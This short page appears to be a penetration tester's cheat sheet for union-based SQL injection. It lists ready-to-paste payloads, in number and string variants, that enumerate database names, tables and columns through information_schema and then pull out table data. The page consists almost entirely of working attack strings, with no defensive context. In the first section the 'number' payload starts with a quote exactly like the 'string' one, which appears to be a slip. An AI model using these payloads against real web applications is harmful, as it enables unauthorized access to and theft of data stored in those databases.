Skip to content

Union-Based SQLi – Quick Method

Pick whichever injection method align with the field being injected.

Enumerate DB Names

Number Injection
' UNION SELECT 1,group_concat(schema_name),3,4,(Enumerate # to go up to using: ' order by <#>-- -) from information_schema.schemata-- -
String injection
' UNION SELECT 1,group_concat(schema_name),3,4...(Enumerate # to go up to using ' order by <#>-- -) from information_schema.schemata-- -

Enumerate all Tables from DB

Number Injection
1 and 1=2 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema='<DB Name>'-- -
String injection
'UNION SELECT group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema='<DB Name>'-- -

Enumerate Columns in Table

Number Injection
1 and 1=2 UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_name='<Table Name>'-- -
String injection
'UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_name='<Table Name>'-- -

Enumerate Data from Table

Number Injection
1 and 1=2 UNION SELECT 1, <Column Name>,3,4,<Column Name>,6,7 from <DB name>.<Table>-- -
String injection
'UNION SELECT 1, <Column Name>,3,4,<Column Name>,6,7 from <DB name>.<Table>-- -